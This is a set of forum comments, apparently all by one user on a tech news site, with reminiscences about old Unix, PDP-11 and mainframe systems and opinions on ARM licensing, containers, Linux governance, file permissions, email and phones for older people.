Re: Yes, those were the days - NOT
One of these days I will learn to type and spell correctly. Not holding my breath, though.
3160 posts • joined 15 Jun 2007
At Clairmont Tower in Newcastle Uni. in the late 1970s, their solution was to put yellow tape on the floor around the Ampex memory cabinet on the S/370 with dire warnings in big letters that anybody going into the exclusion zone would be ejected from the data centre sharpish.
I do not know whether it was physical movement or static, but the 370 did not like losing 4MB of it's 6MB memory.
Actually, thinking about it, not that different from the social distancing measures being taken now,
In the 1980s, I looked after a Systime 5000E (repackaged PDP11/34A with 22 bit addressing bolted on) which had CDC SMD drives rather than DEC drives.
We payed an external data company to clean the platters of all of the disk packs about once every 6 months (normally during the academic vacations). This was mainly because we would regularly switch disk packs, as we ran 2 OSs (RSX11/M and UNIX Edition 6 and later 7) at different times of the week.
The guy came in with a machine that would not only allow him to clean (with solvent and special large lint free giant cotton bud like tools) but also check the balance and warp of the platters to try to stop head crashes. I think it earned us a slight discount on the system maintenance cost.
When they came in, they wanted the space they would work in to be deep cleaned, and insisted that the doors and windows were shut while they were working.
Our biggest bug-bear was heat. It was meant to be an office environment machine, but we found it required more ventilation than we could give it, and we anxiously watched the thermometers during the summer. Difficult decision to either open the windows and let dust in, or keep them shut and watch the temperature. They bean counters would not allow us to buy a window mounted AC unit, which would have been the best solution.
So this would be the Acorn Network computer, yes (and running an ARM chip)?
But there is prior art!
NCD had X terminals in about 1987 (which may or may not have had the Display Manager running locally depending on how it was configured), and it it not too far a stretch to get to the AT&T Blit in about 1983, although that was neither cheap nor compact.
It would not surprise me to find something from Xerox PARC knocking around at about the same time as well.
I'm a good IT contractor. I'm a lousy company administrator and director, as was proved by the 10+ years of trying and getting fined regularly by the Revenue and previously Customs for filing my returns late (I know, you can now find big panel accountants who will do most of the work, but that hasn't always been the case).
But around 10 years ago, I found that I could forego the marginal tax and NI savings (I was actually opposed to tax avoidance measures anyway, which is why my accountants didn't like me), and found it was just easier to be the employee of an umbrella. I'm a cop-out contractor, I know. My decision.
And now, with IR35 looming again, I'm smiling inwardly at the predicament of all of the contractors I know whose anxiety is ramping up again pending next April. I've already seen many friends leave contracts that they could have extended because they're so worried about what the Revenue will do, and the way that the IR35 change was crassly delayed last March was a joke.
I was particularly annoyed when the umbrella company I use outsourced the authentication of their web portal to Facebook.
What this means is that I have another Facebook account (besides the bare account I keep to allow me to access services from companies that think FB is the only way to interact with their customers on the Internet) that I know very little about. I don't know exactly what is stored under it. I'm also a little uncertain about how outsourcing the authentication to a third party actually fits in to GPDR, and I don't remember explicitly agreeing to have the data transferred to FB, and I normally read the T&Cs (difficult when they're so long and boring) when I'm asked to. Maybe I should put a data protection request in to see.
Yes, I know that Nvidia have in the past been a bit of a problem with regard to their graphics processors, but that particular clip is from 2012. But some things have changed, and at least for some of their older GPU architectures they are providing some documentation, and do have half decent binary drivers now (their offerings used to be crap, and well ot of date).
But ARM is a completely different market. They have a high mark up on their GPUs, and need to protect their revenue stream. They cannot take the same model and apply it to ARM designs.
Firstly, they do not currently control the manufacture of the devices, and they only have the initial use license fee and a very small per-core license fee.
Secondly, there are already licensees who have the rights in perpetuity to take their existing designs and re-implement and modify them. This means that even if they decide to take future core designs private, that will not stop existing designs evolving. If they do this, they run the risk of fracturing the market, and as they need high volumes to be able to continue to get revenue on the low per-core license few.
Third, if they decide to limit or increase the cost of new licenses and license renewals, this will give the chip companies a reason to invest in other architectures like RISC-V and even MIPS (companies like themselves!)
Remember, the only thing that really makes ARM processors stand out is their low component count and power, licensing terms and ubiquity. The architecture has always been relatively simple, even with some of the newer designs. There is no reason at all to suppose that given the right impetus, other simple designs could not be produced. ARM have a head start, but there are a lot of people out there who could devote a lot of resources to try to catch up using already existing or new work. It's just that at the moment it's not worth it.
Nvidia will not want to take the technology private. It's not worth $40bn in cash and stock just to have another private design. The value is in volume and market penetration.
That's a radical statement. Care to elucidate?
They say that the licensing model will persist, and beside that, chip makers already have licenses, several of which are architecture licenses which allow them to extend the architecture, and are for perpetuity.
This means that Arm devices are here to stay, and in case you didn't notice, already have Linux ported to them.
As an example, look at Raspian running on a Pi-4. I could quite happily use that as a desktop system.
What may change is the cost of non-perpetual licenses. Some companies may find the cost of their license renewals increasing or becoming unavailable, but too much of the latter will kill the business.
Sometimes I wonder just how much of the manufacturing that happens in China is actually economical and profit generating.
I know that the postage rates are skewed against other country's postal systems, but when you can buy cheap tat direct from China with free postage at less than the price it would cost to merely ship it within the UK, you have to wonder whether there is some Chinese subsidy in the system, either explicit or implicit, designed to make sure that low-cost manufacturing is killed in other countries.
In the past, when China was emerging from it's shell and did not allow currency exchange, I always had the opinion that it was being done to enable China to get foreign currencies. You know, pay the workers and materials in Yuan which have no value outside of China, and sell in dollars and pounds, but surely we're way past that point now.
Unfortunately, decreasing the infant mortality does not in itself reduce population growth unless tied to education that large number of children is not desirable.
Many people living in marginal environments have to have a lot of children because not all of them survive, and their children are their pension. But they don't necessarily make the link between these things themselves, it's ingrained in thier society. In these societies, having a large number of surviving children is a statement of high status, and this will not change overnight.
Just allowing more of the children to live is not going to immediately reduce the family size, at least not until the 3rd or 4th generation. By this time, exponential growth as a result of more children reaching childbearing age will make the situation worse.
In the long term, I do agree, but it's not enough in itself.
If you eliminate the containers, you don't even have those duplicated files in the first place!
I am aware of how the union filesystems work (and have been for many, many years), but on a single OS image, you do not need to even have this complexity.
I was not really serious about eliminating containers, because they do provide some isolation from the underlying hosting OS, allowing applications from different OSs to sit on a single system, without the overhead of different full OS image under a hypervisor, but I was partly serious about moving everything back to a single OS, although some of the resource isolation features may need to remain to guarantee minimum resource allocation.
I know that "everything to run will be in the container", and have even been playing about a bit with things like Docker.
I know that you are supposed to spin up the container running as few processes as possible (although thank heaven the original "one process per container" idea seems to have been dropped), but many existing applications are not written to work like this.
The article says that it is a kernel (and presumably sufficient libraries), but also says that the tooset is written in Rust (to eliminate security holes and memory leaks, apparantly). Has the full GNU toolset been ported to Rust? I think not.
When I think what is happening, I feel that what we have with containers is a shift up the virtualization stack. We had an OS which ran applications and processes. They then put in Hypervisors above the OS, to allow isolation between different OS images. We've now moved down a level, so the hosting OS becomes the Hypervisor, the container becomes the OS, and the applications are... still applications.
I wonder how long it will be before someone suggests radically revisiting the process-to-process isolation, and deleting the containers as wasteful, so we then go back to properly isolated processes running on a secure OS. Round in a full circle.
You are aware that bash (at least on Linux) is a shell not a terminal emulator.
The difference is that shells process commands, and the terminal emulation handles the presentation. This allows you to keep the same terminal emulation while changing the shell you want to use.
I know I'm an old foagy, but this type of confusion between components on systems is part of the root of many of the problems with modern CLIs.
You use something like Putty or an xterm to get access to the system, and you then run a shell such as bash or ksh through that access to run commands. This allows you to separate the terminal emulation from the command processor. So the terminal emulator handles driving the screen, handling keys and doing the copy/paste, and the shell runs commands.
It fits in with the Unix ethos, do one thing, and do it well.
I know this is conflated by the monolithic commands that developers appear to like developing now, where the a single tool does everything, and that has it's place for some types of applications, but basic OS commands should IMHO be independent of the terminal access.
This is something that I don't believe Windows has ever done properly. The command.com window was seen as just for legacy DOS type programs. Maybe this is a move in the right direction.
The Linux Foundation is an organizing group that looks to standardize and co-ordinate Linux development. It appears that all you need to do to become a platinum member (necessary to get a seat on the board) is donate $500,000 per year, and have some interest in Linux development.
Microsoft has an interest in Linux development. They are building Linux based technology into Windows, and they have to support Linux in their Azure cloud, because customers want it.
I believe that there are quite a lot of Microsoft contributions to the Linux kernel. According to some articles, in the last year they have been the fifth largest contributor. I have not looked myself, but they are almost certain to have put code in to ease Azure compatibility, and the Windows Subsystem for Linux will almost certainly have some code in the kernel tree to smooth out the interface with Windows. And it would not surprise me if they have more in there as well.
I am suspicious about Microsoft involvement, but it may be that there is a place in the Foundation for them. But I would be wary of it, if I was another board member.
Other people have hinted at what I'm about to say, but I don't think anybody has explicitly said it.
Using a tool that is not open source (say Teams or Slack) puts the project at risk of changes in those tools. The good thing about email, and it's lowest common denominator 7 bit ASCII is that email is a distributed system that would allow Microsoft or Google or any other mail provider to disappear overnight, and still continue to operate.
Even if GitHub were to disappear, as long as there was a copy of the source in another git repository, it could be re-built relatively easily.
If there were a non-propriety, open source, distributed collaboration system available, that may be better. This is not the way the computing ecosystem is going, as these systems need to be paid for by someone, and for a non-profit that does not charge for what they produce, finding money to pay for something is difficult.
Everyone has email servers or at least access to them, so Linux kernel development is piggybacking on something that is being provide for other reasons.
I think when it comes to the character set that the kernel is programmed in, you have to look at the computer language that it is mostly written in. That is C. C is a computer language that assumes a certain character set, and that will almost certainly be similar or the same as 7 bit ASCII, or one of the related supersets in ISO or UTF 8 bit character sets.
You can almost certainly write comments or function or variable names using whatever is allowed by the superset that a compiler will accept, but the basic keywords are defined in English.
I'm sure that there are some code written in Cyrillic, or the compound ideograms used by East Asian languages, but as soon as you start doing this, you close the code from the rest of the world. You already see this when looking at, say, electronic datasheets on the Internet, as those written in Chinese for devices that originate in China are incomprehensible to the majority of the world.
This may be cultural imperialism, because English speaking countries were so dominant during the development of the basic computing infrastructure. but I believe that writing compilers and complex systems in something like zhōngwén is complicated and unlikely to happen.
Back in the early '80s I worked at a Polytechnic, and was responsible for spending a chunk of the contingency fund at the end of one financial year, with the aim of producing a teaching room for what was called "Computer Appreciation". The purpose was to have lots of different types of hardware available so people who did not know anything about computers could see what they could do. The systems were BBC micros, of course.
One of the devices we found was a robot arm with 6 axis's of movement that was very functional for the price. To keep the costs down, they used normal rotary motors, with shaft encoders made up of IR transceiver devices, with a 4 quadrant rotating reflector on each shaft to 'bounce' the IR back from the transmitter to the receiver. It was all very elegant, and worked really well.
That is, until I tried using one in direct sunlight one day. Unfortunately the design did not have light covers on the encoders. As soon as I issued the return to home command to the controller to calibrated the position. It started all the motors (something quite interesting, because all the motor channels could run simultaneously, unlike most of the other non-industrial teaching robots), and proceeded to pull itself off the desk as all of the moving parts moved to the physical end-stops, causing the arm to contort in a way it was never really designed for.
We worked out that the bright sunlight swamped the IR detectors, so even though the motors were running, it could not detect the movement of the rotary shafts. I suspect that there was also a bug in the controller software that needed to see the shaft rotate before it would look for them to stop to detect the end stops, but I never knew that for certain.
The fall damaged some parts, so we went back to the manufacturer, and asked whether they could provide spares. We explained how the problem happened, and they said that they would see about designing some light tight covers, but although we got the parts to repair the robot (they came in kit form anyway, so replacing some of the parts was not a problem), we never saw any covers from them.
Shame really. They were the best educational robot arms I ever saw, so long as you used them out of direct sunlight. It's a shame that some of the HND students never saw fit to do their project with the kit available in the lab, as we had hoped. I often wonder what happened to all of the 'toys' when the lab. was replaced ( I left before the lab was dismantled), but I guess that some of the lecturers with their own BBC micros gave them a home.
The thing about ARM and their processor designs is not that they are particularly special as far as the techniques are, but that no other chip manufacturer has managed to produce a chip that provided performance at a very low power budget.
Even Chipzilla gave up the fight, although they were trying to reduce the poser consumption of their existing family of processors (because they thought compatibility would be a big selling point), not trying to produce a new design from the ground up.
There have been and are other processors that could steal ARM's crown. RISC-V is the most obvious candidate, but I'm sure that the MIPS processor designs could be re-engineered to produce low power designs, and I'm following whether some of the micro-controllers from people like Microchip Inc, or NXP may be enhanced with more capable instruction sets, but they seem to have selected ARM for their more capable offerings.
But ARM have a major head start, with proven designs available at reasonable licensing costs, available to build into SOC designs. And some of the features, like big.LITTLE are very clever at producing designs that are very low power, but can scale up to higher performance very rapidly.
What will decide whether ARM remains a dominant design is probably whether the people who end up owning the IP want to try to increase revenue by upping the license costs (like Softbank said they were going to try to do). Once ARM licenses are seen to me more expensive than the necessary investment to make RISC-V or another design bear fruit, the advantages of ARM will be lost.
I know people who were brought into IBM as part of a TUPE, and remained there for significant amounts of time (more that 10 years) and some until they retired.
But it depends on the skills and usefulness. I suspect that any of the EY staff that have any Cloud or recent security experience will be OK, but probably not those who are involved with rather more traditional technologies.
Were you serious about the PDP-11? What browser are you using? I would have thought that even an 11/93 or 94 would struggle with the most lightweight of browsers, unless you're still keeping Lynx or Lyx going, and if so, do may websites still provide text only rendering of web pages? Does X11 even work?
Or do you have one of the Mentec upgrades or the ASIC re-implementations? But still, the memory restrictions inherent in the architecture would provide serious problems for modern browsers even with 22-bit separate I&D systems.
Maybe I'll give it a go, but it would have to be in emulation for me.
Of course, to counter the people who wonder why it is not vulnerable, the PDP-11 never included any speculative prefetch features, so by definition cannot suffer from any of these issues.
The picture at the top of the referenced article has clearly been Photoshopped!
The left hand set of tanks clearly 'chop' the top of the right hand yellow bollard. And when you look closer, the shadows on the three sets of tanks are not consistent with each other and the building on the left!
Shoddy work by Microsoft PR.
I said nothing about smartphones. They are even more unsuitable.
You must be lucky to only know older people without any health issues. Pretty much all of the people over 70 that I know have one or more of the problems I've outlined, especially age related farsightedness. I'm only 60, and yet I find I have to juggle spectacles in order to do different things (and did, even when I wore varifocals almost all the time - but I had myopia and now have presbyopia creeping in).
If you want cheap, you just need to look at Tesco.
Don't know if they still have it, but they had a Imo phone (never heard of them) for £14.99, or £4.99 if bought with £10 Tesco Mobile credit. It's not a great phone, but it works and it's crazy cheap, especially if you were already using Tesco Mobile.
As always, it depends on the users capability and what they want to use it for. My father is deaf to frequencies above about 1KHz, and literally cannot hear the ringtones that come as standard on most phones.
Add to that the fiddly nature of plugging in a micro USB cable to charge, the ease that most phones like this can be dropped and the inability of some people with presbyopia to see the screen and legends on the buttons for phones like this one, and you can see why it is not that suitable for many older people.
Of course, many are lucky to still be dexterous, able to see close up, and still have their hearing, but I know a fair number of older people with at least one or more of the problems I've outlined, for whom this phone would be a difficult to use.
There's already several phones out there that are better. Just search on Amazon
What most older generation people need are:
1. A VERY loud ringtone that is lower frequency than most of the normal stock ringtones
2. A VERY loud speakerphone mode that is easy to engage
3. Large buttons, with the answer button easy to find
4. Easy to set up speed dial for single press calling
5. As larger screen as can be reconciled with point 3
6. A large, clear font, together with an appropriate UI to make selecting contacts as easy as possible
7. A long battery life, together with easy charging, like a cradle
8. Anything that is not directly associated with making and receiving calls not cluttering the UI
9. An emergency call button easy to find when wanted, but not so easy that it can be pressed by accident.
And this should all be in a package that is easy to hold for people with grip issues, and robust enough to survive being dropped.
This Nokia phone does not meet many of these criteria.
This is not an advert, but I bought a Chinese phone badged Ushining from Amazon for my dad recently, as it ticks nearly all of the points I outlined. There are several other phones from Doro, Artfone and Easyfone, amongst others.
But I wonder how many of the people who rely on setting permissions at 0777 have come from a Windows background, and do not know of any other way to make their applications work (I have come across numerous people across the years who say something like "Why do all these security restrictions exist. It makes my job so much harder...")
I complain bitterly to anybody who sets something like this up on a system that I have some responsibility for. Does not always stop it, however, as JFDI appears to apply in the management eyes, and I do value working.
Too many people think that *they* are the only people working on a multi-user system.
It was the other way around. Someone went into one of my folders and moved files around.
Ouch! I should have checked myself, so I guess I'm part of the problem.
But that could not happen by default on systems with NFS mounted filesystems that I administer (nor, in the past on AT&T RFS (look it up) or DFS and AFS filesystems whose ACL system are more like Windows). Directories are created as 0755 or 0750 (depending on which environment I'm working on) by default.
... indicate how unsuitable MS/PC DOS was as a network operating system, something that persisted into the Windows era until the advent of NT.
But it trained several generations of system admins. and developers to be extremely lax with how they treated the security of the systems they worked on.
Even now, it seems that many organizations do not even take the basic steps to enforce decent limited user access on their Windows shares. I was looking at one of the shares I have to use the other day where I work (at ostensibly an IT company) and saw that by default all shares were open for write access for everybody, even those that were specific for users and teams. No wonder ransomware can de so devastating in these environments!
Windows can do it properly. Why don't people use these protections?
I'm not sure. As far as I'm aware there's no 'free' version of Red Hat. There is Fedora and Centos, but neither of these are actually branded "Red Hat", and both of those are supposedly community supported products, with some financial sponsorship to keep them running.
It was some time ago, but I tried to download a copy of Red Hat Enterprise Linux, and it was difficult without evidence of a support contract.
I look at their current site, and I can see a "Free, 30 day evaluation", but that is not the same as free.
They make the source of all of the 'open' parts of Red Hat available, and contribute upstream, but that is not the total of RHEL, and as far as I know, they do not provide a 'built' version of what is on GitHub. You are free to download it and build it yourself, and they even tell you how to do that, but this is beyond most users. Or you can get a downstream distro like Centos (which used to be completely separate from Red Hat), but that is not really a Red Hat release.
Using the suggested LibreOffice model, there should be a freely available Red Hat Personal Linux or something similar. Instead, we have Fedora which is like a beta program for some of the upcoming technologies, with an upgrade model that makes it impossible to do anything like an LTS release of Fedora. If you use Fedora, you're either frozen in time or on a fast running treadmill to keep up.
IMHO, Canonical has a better model, where they really do have the same products for community and enterprise freely available and patched to a defined schedule, with paid support and education (and some closed management tools and application frameworks) as the differentiating points. This is the reason why I never got on the Fedora path when the original, really free Red Hat Linux was discontinued in the early 2000's.
Red Hat are doing some important (and also some really annoying - think Lennart Poettering) things in the open source space, but IMHO, their Open Source credentials are not as convincing as people think.
These are my personal opinions, and you are free to disagree.
The count of the number of tests being done was a meaningless number collected initially to show the government had achieved a target.
The reason why it is meaningless is that it did not indicate the total number of prople tested, as some people, like NHS workers, will have been tested multiple times to make sure they remained free so they could continue to work safely.
I don't believe that the articles actually say the tests were being stopped.
Not testing everybody who has been traced does not make any sense, however. Especially as there is no guaranteed sick pay for the people they're telling to lose 2 weeks income. People who absolutely need the income will just ignore the warning unless they either show symptoms, or it becomes a criminal offense to not isolate.
Late 1980s. Large telecoms development company. Mainframe data centre just outside a small Wiltshire town supplied by overhead power cables. Enterprise grade UPS with diesel backup generators.
What we learned was that multiple power brown outs during a significant thunderstorm was sufficient to defeat this setup.
The problem was that each time the power grid browned out, the UPS would kick in, switching to battery and temporarily turning off the air conditioning, which would have been switched back on once the generators started. The problem was that the power resumed before the generators started, so the UPS switched back to mains, and shortly afterwards, the aircon came back on.
Until the next brown out a few minutes later, and the next, and the next. Over the course of about 2 hours, the batteries became depleted, as there was no time to recharge them after each brown out, and the temperature in the machine rooms began to rise as the air-con was off so much of the time.
Eventually, even though the UPS should have been able to keep the whole DC running, it was decided to turn off the mainframe and the development and test environments, and halt work for the rest of the day,
I'm not sure why, but there the manual switch to generator in this setup had been overlooked in the design, which would have been able to keep the data centre running had there been one. But this taught me was that even professionally designed, very expensive UPSs are not a guarantee of continual operation.
Back in the early 90's, and very late one evening when I was providing on-call support, I was on a call from a customer who had managed to do an "rm -r" (fortunately on a data filesystem rather than /) on one of their systems, but who had very sensibly just hit the power button, and was wanting to recover as much as they could.
I sat on the phone with them for a while, talking to them continuously, while I worked out in the background (by deliberately corrupting a filesystem on one of our test systems) how to scan the filesystem using icheck and fsdb to work out which inodes with zero link counts still contained the block list for the deleted files.
Once I had this sorted, I got the fax number for their office from our customer records, and sent the script to it from my desk using our fax server. I then said I was sending them the script, and they asked how I was sending it, and how long would I take. By that time the fax had left the queue, and I just asked them if they knew where the fax machine for the number I'd sent it to was, and that they would find the script there. I could never understand why they were so surprised when they looked and found it. Shows that even technical people did not fully appreciate the advantages of an integrated IT system.
Once they knew that they had the script, and that it worked (it set the link count in the inode to one, and then let fsck sort out re-linking the file into the lost+found directory), I left them to it, saying that they could page me again if they had any further problems, which they did not do.
I got into the office the next day to find that the customer had completed the procedure, and had all of the data that they could not live without back (although not all of the files). The credit for closing the call went to the start-of-day person who called them back to confirm the state of the call!
And did I get any thanks? No. Of course not. I actually doubt that any of the other on-call specialists in the centre has the same knowledge of the UNIX filesystem, the fax machine setup and the test systems to be able to do the same.
I'm not sure you fully understand the case.
The issue is that Apple are using trademark legislation to prevent what could well be genuine parts removed from broken or failed devices to be used for repair.
Their assertion is that the parts are actually counterfeit, and seem to have persuaded the Norwegian legal system this is the case.
They do have a case. There are counterfeit parts manufactured and sold as genuine. But there are also genuine parts available. It is difficult to tell on cursory examination.
As I understand it, there is also a grey area where damaged genuine parts have the damaged elements replaced, for example, a functional genuine screen with damaged glass has the glass replaced, probably with the same spec. glass that Apple use, so is an amalgam of a genuine and after-market part. Does that make it counterfeit or genuine? I'm not sure, but Apple assert that it is counterfeit.
Apple says that anything they didn't supply that contains any Apple identifying symbols must be counterfeit, something that is almost certainly not true. As a result, they stifle the supply of parts to just that of what they deign to supply at whatever price they want to sell at, and the real counterfeit parts (which they also want to ban but have difficulty at the current time).
Once they get this, they can control parts supply to make it uneconomical to repair their products. In a normal supply-demand economy, this should damage their brand, but it seems that the buying public are just so enamored by that logo that they continue to pay large sums for devices that may well break and become un-repairable long before the customer expects.
Basic student prank back in the late 1970s. Write a shell script to emulate the login screen on a UNIX system. to capture the user ID and password of the next user of the terminal.
Second level, write it in C so that it would not display the password when it was typed (the stty program was less advanced on Edition 6, and did not have -echo and echo, and if you used raw mode, it was difficult to process end-of-line correctly in shell).
Was a war of wits. When you walked up to a terminal, you pressed return several times to cycle through to the real login screen, then the programs would notice no username and would loop. Then use EOF to get getty to recycle, and the programs would trap EOF and loop round. Then press break (it was the default interrupt on Edition 6) and the programs started changing the interrupt character.
The best of the login screen key loggers that were written were really sophisticated towards the end of the 'war'.
Eventually, the sysadmins started threatening to ban students engaged in writing these programs, but not before finding the source code and examining how they were doing what they were doing. UNIX was new back then, and everybody was learning from each other!
Strictly speaking, it was PL/1 (Pea El One). although the 1 was oflen written as an "I" as in the Roman Numeral. But I get a bit upset when someone pronounces it as Pea El Eye, which people are prone to do.
But yes, it tried to be all things to all people, a scientific language, a business language, a control language and in some of it's incarnations (like PL/C which I used when learning PL/1 as a formal language in 1978), a teaching language.
It had many unusual features. The one that I found most interesting were implied loops in I/O statements that allowed whole or even part arrays to be written out in a single PUT statement.
The other language I was formally taught was APL (literally A Programming Language) of which I used to say (somewhat repetitively) "It's all Greek to me!"
Neither of them helped me with my first job, which was as an RPG2 programmer! Thank goodness I had taught myself C while at University. And I had no problem teaching myself Pascal at my second job.
You're not thinking far enough back.
Before the rise of Google, Yahoo, Hotmail et. al., email was very distributed. Major operations ran their own smtp server which, provided that TCP/IP and DNS MX records continued to operate, would allow messages to get through even when there was some disruption. And TCP/IP was originally intended to be resilient, and DNS is, by it's very nature, distributed.
This wasn't very helpful for home users, but did work well for companies, and hey! there wasn't the demand for email from joe public.
Sure, an organisation's own server might go down, but it's really not that difficult to have multiple mail exchangers for a mail domain, and many did. But even if one companies mail server broke, the rest of the email infrastructure around the internet didn't, and even undelivered mail would eventually get through if the service was restored, or generate a bounce message to the sender after a timeout if it wasn't.
We're now suffering from single large suppliers of services becoming single points of failure, outside of the users or customers control. The very intent of the distributed Internet is being undermined by the Google, Facebook et. al. large service providers, and even companies that do understand, are putting their eggs in the AWS and other cloud providers baskets (Slack runs on AWS, yes?)
It's all looking a lot like when companies used to do their batch processing at computer bureaus as it was in the '60s and '70s, but on a vastly larger and more pervasive basis.
I've recanted this story before, but when I was in the support for a large multinational business system supplier, I was the co-ordinating specialist for a consorium of educational customers who were getting a reputation for not checking or testing any fixes we supplied to them. Unfortunately, they were important for PR reasons, which is why they had an allocated specialist as a primary contact point.
One of my jobs every week was to call my contact there and ask whether they had made any progress in apply any of the updates or fixes they'd been given.
One frustrating day, I put into the problem record my true feelings, something along the lines of "Sheesh, <Customer name> applying any fixes? Not a chance!". It was only mildly derogatory, but what I didn't realize was that not only did the customer have a technical advocate, they also had a relationship manager who allowed them to read the problem records....
I was duly hauled into my managers office with the relationship manager, and whilst my manager privately agreed with my sentiments, he had to be seen to be telling me off.
Unfortunately, a few months later, the then relationship manager moved into the support centre - as my manager! Fortunately, he was quite a decent guy, and we actually ended up with a good working relationship once we had cleared the air.
There was a K6-III as well, and it held it's own very well against the Pentuim-III, although not all Socket 7 motherboards would work with them.
Wikipedia says that the K6-III+ tops out at 500MHz, but I was pretty certain that I had one rated for 550MHz, although it could have been a K6-2+
The dangerous commands comment should, obviously, carry a caveat of if you are running commands that you do not know what they do as a privileged user, you should have your privilege revoked immediatly.
I don't know how Unix got dragged in here, but ever since Unix edition 2 or 3 in the 1970s, you've had the concept of ordinary users and privileged users, so there has been no excuse to do day-to-day user tasks with a privileged account.
Biting the hand that feeds IT © 1998–2020